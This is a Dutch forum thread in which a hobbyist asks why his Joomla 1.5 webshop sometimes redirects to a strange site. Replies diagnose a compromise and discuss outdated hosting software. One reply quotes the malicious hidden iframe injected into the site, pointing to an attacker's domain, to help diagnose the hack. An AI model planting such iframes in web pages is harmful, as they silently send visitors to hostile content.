Af en toe redirect op eigen website

Pagina: 1
Acties:

Acties:
  • 0 Henk 'm!

• zeezuiper
  • Registratie: Januari 2002
  • Laatst online: 21:27
De website www.rikxoort.com is door mij (hobbymatig) gemaakt en wordt ook door mij onderhouden. Als ik echter nu naar de site toe ga wordt ik geredirect naar een of andere wazige site (http://rank.multidimensionalpersisted.org/berntrj.cgi?7) . Dit heb ik echter al een maal eerder gehad (toen naar msn.com) alleen dit was binnen 24 uur opeens weer over. Ik heb toen een call aangemaakt bij KPN (de webhoster) alleen tegen de tijd dat ik reactie kreeg was het dus al weer over. Ook konden ze mij niet vertellen wat er gebeurd was :(

Weet iemand wat het probleem is? Is de site gehacked, maar waarom werkt het later dan wel weer opeens?

Update: Nu werkt de site weer wel 8)7 , ik had daarnet toch echt op meerdere PC's en meerdere browsers hetzelfde probleem.

[ Voor 13% gewijzigd door zeezuiper op 02-11-2012 20:05 . Reden: Update ]

Acties:
  • 0 Henk 'm!

• MueR
  • Registratie: Januari 2004
  • Laatst online: 23:48

MueR

Admin Tweakers Discord

is niet lief

Er zitten wat maffe iframes in je site
HTML:
1
<iframe src="http://Romantic.multidimensionalpersisted.org/trjrtntrn.cgi?7b" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>

Gok dat er toch iets mis is.

Anyone who gets in between me and my morning coffee should be insecure.

Acties:
  • 0 Henk 'm!

• Compizfox
  • Registratie: Januari 2009
  • Laatst online: 23:31

Compizfox

Bait for wenchmarks

Site is zo te zien compromised. Avast geeft waarschuwingen op de site (hij laadt wel die vuurwerksite, neem aan dat dat de bedoeling is)

Gewoon een heel grote verzameling snoertjes

Acties:
  • 0 Henk 'm!

• zeezuiper
Klopt, de vuurwerk site ik de bedoeling. Die iFrames niet. Damn, had gehoopt dat ik nog een jaar met Joomla 1.5 kon doen, niet dus :(

Acties:
  • 0 Henk 'm!

• Bobmeister
  • Registratie: Augustus 2008
  • Laatst online: 20:57
Joomla 1.5 is wel erg oud. Zijn ook aardig wat exploits voor ..

Acties:
  • 0 Henk 'm!

• zeezuiper
Tja, wat is wijsheid. Ik kan een backup terugzetten die nog niet gecompromised is, alleen hoe lang duurt het voordat deze opnieuw gehacked wordt?

Het probleem is dat de webhoster (KPN dus) officieel alleen 1.5 ondersteund :( . Daarnaast zit je met het feit dat ik in één maand (vuurwerk, december) de hele site moet omzetten. Lay-out, virtuemart, producten, i-deal etc. Wat ik al zeg, het is een hobby project, niet mijn werk (geen mij een Windows server en ik doe er alles mee, met Linux, PHP en dat soort zaken blijf ik toch zoeken).

Acties:
  • 0 Henk 'm!

• Compizfox

Compizfox

Bait for wenchmarks

Ik zou gewoon opnieuw beginnen.

1.5 gebruiken is een no-go (al scheelt het al iets als je naar de laatste versie uit de 1.5.x branch updatet), en met upgraden ben je sowieso veel tijd kwijt.

Joomla draait trouwens alleen op PHP ;)

[ Voor 10% gewijzigd door Compizfox op 02-11-2012 20:26 ]

Acties:
  • 0 Henk 'm!

• zeezuiper
Je wilt niet weten hoeveel customization er in zit :) . Gewoon opnieuw beginnen is dus een optie maar wel een hele lastige en tijdrovende. Zeker omdat die begin volgende maand dus moet draaien.

Ik draai overigens wel de laatste 1.5 versie van Joomla, voor wat het waard is.

Ik ben al wel tijden aan het spelen met Joomla 2.5 en Virtuemart 2 (in een testomgeving) maar daar liep ik nog tegen teveel issues aan, vandaar dat ik nog niet over ben.

[ Voor 3% gewijzigd door zeezuiper op 02-11-2012 20:37 . Reden: Layout ]

Acties:
  • 0 Henk 'm!

• Compizfox

Compizfox

Bait for wenchmarks

Jup, het is veel werk. Ik heb het een tijdje geleden ook met mijn site gedaan, en ook als je upgrade (en dus niet opnieuw begint) zul je alle extensies opnieuw moeten installeren, en voor sommige extensies alternatieven moeten zoeken omdat er geen J2.5-versie van is.

Acties:
  • 0 Henk 'm!

• zeezuiper
Ik denk dat ik maar even het grote webhoster provider ervaringen topic ga opzoeken.

Dan kan ik parallel bij een andere provider een nieuwe site op proberen te bouwen en dan daarna die uit het stenen tijdperk stammende KPN de deur uitdoen. Lijkt mij tenminste de meest veilige oplossing.

Tenzij iemand anders nog goede suggesties heeft om het bestaan van mijn site tot het eind van het jaar te rekken (restore loopt ondertussen, ben benieuwd wanneer die weer gehacked wordt :/ ).

Acties:
  • 0 Henk 'm!

• Grijze Vos
  • Registratie: December 2002
  • Laatst online: 28-02 22:17
Dit zou ik ook even doorsturen naar Kassa oid. Een hoster heeft een verantwoordelijkheid om software up to date te houden lijkt me.

Op zoek naar een nieuwe collega, .NET webdev, voornamelijk productontwikkeling. DM voor meer info

Acties:
  • 0 Henk 'm!

• Bobmeister
  • Registratie: Augustus 2008
  • Laatst online: 20:57
Grijze Vos schreef op zaterdag 03 november 2012 @ 02:35:
Dit zou ik ook even doorsturen naar Kassa oid. Een hoster heeft een verantwoordelijkheid om software up to date te houden lijkt me.
8)7

Joomla heeft zeezuiper er zelf opgezet. Dát is gekraakt. Er is niet van de hoster gekraakt ... Het is absoluut niet de verantwoordelijkheid van de hoster om Joomla up-to-date te houden.

Acties:
  • 0 Henk 'm!

Anoniem: 282855

*Je reactie is kansloos*

[ Voor 59% gewijzigd door MueR op 03-11-2012 11:54 ]

Acties:
  • 0 Henk 'm!

• zeezuiper
Ho, ho. Ten eerste, ik heb zelf Joomla erop gezet, niet Joomla mij :)

Maar, ook dat is niet helemaal waar. KPN heeft een soort Installatron waarmee je dus een aantal pakketten kan installeren. Bij een fatsoenlijke hoster kan je netjes kies uit Joomla 2.5.x of 3.0.x (laatste versies). Bij KPN kennen ze alleen nog maar 1.5 8)7 .

Tuurlijk kan ik zelf Joomla upgraden naar een recente versie alleen als het dan niet werkt en ga ik bij KPN klagen krijg ik natuurlijk te horen "nee mijnheer, dat ondersteunen we nog niet".

Acties:
  • 0 Henk 'm!

• Compizfox

Compizfox

Bait for wenchmarks

Maar dan nog kun je gewoon zelf Joomla erop zetten (en niet van dat Installatron gebruik maken). Niet zo netjes van KPN natuurlijk, maar het is geen verplichting om Installatron van updates te voorzien.
Daarnaast zou het überhaupt niet mogelijk zijn om via Installatron J1.5 naar J2.5 te kunnen updaten. Daar zit namelijk altijd handwerk in vanwege de database layout die op de kop is gegooid ergens tussen die 2 versies.

Daarnaast, sinds wanneer zou een webhoster een CMS moeten ondersteunen? Je mag er gewoon opknallen waar jij zin in hebt hoor ;)

[ Voor 24% gewijzigd door Compizfox op 03-11-2012 12:36 ]

Acties:
  • 0 Henk 'm!

• zeezuiper
Compizfox schreef op zaterdag 03 november 2012 @ 12:35:
Daarnaast, sinds wanneer zou een webhoster een CMS moeten ondersteunen? Je mag er gewoon opknallen waar jij zin in hebt hoor
KPN (mijn website):
Database Version: 4.1.22-Max
PHP Version: 5.2.17

Joomla 2.5 requirements:
Software Recommended Minimum More information
PHP 5.3 + 5.2.4 + http://www.php.net
MySQL 5.0.4 + 5.0.4 + http://www.mysql.com

Ik wou het gewoon maar niet gaan proberen ;w .

Acties:
  • 0 Henk 'm!

• MueR

MueR

Admin Tweakers Discord

is niet lief

Je moet gewoon een goede hoster pakken. MySQL 4.1 wordt al sinds 2009 niet meer aan ontwikkeld.

Acties:
  • 0 Henk 'm!

• Compizfox

Compizfox

Bait for wenchmarks

Aha, dat is dus gewoon een oude versie van PHP en MySQL. Iets wat wel de verantwoordelijkheid van de hoster is.

Acties:
  • 0 Henk 'm!

• hylke94
  • Registratie: Maart 2012
  • Laatst online: 07-07 18:59
Ik wil geen reclame oid maken, maar ik heb nu bijna een jaar twee websites online staan bij http://www.mijndomein.nl. Hier draaien ze de laatste versie van php en mysql ed (https://www.mijndomein.nl/webhosting, zie onderaan voor de versienummers) en heb hier nog nooit problemen mee gehad.

Acties:
  • 0 Henk 'm!

• MueR

MueR

Admin Tweakers Discord

is niet lief

Net als elke fatsoenlijke webhoster overigens. Wij draaien zelf nog wel een server met php 5.2.17, maar dat is voornamelijk omdat er een aantal third-party dingen op draaien die echt niet op 5.3 kunnen draaien.

Ik denk niet dat KPN even snel voor jou gaat migreren naar een nieuwere versie trouwens. Die hosting dingen bij je internet abonnement zijn niet bepaald hoge prioriteit en support heb je er al helemaal niet op.

Acties:
  • 0 Henk 'm!

• Cartman!
  • Registratie: April 2000
  • Niet online
MueR schreef op maandag 05 november 2012 @ 10:37:
Die hosting dingen bij je internet abonnement zijn niet bepaald hoge prioriteit en support heb je er al helemaal niet op.
Dat, voor een paar tientjes per jaar heb je al een prima host waar je wel gewoon support kunt krijgen. Ga dus gewoon weg bij KPN, amateuristische bende met die versienummers.
Pagina: 1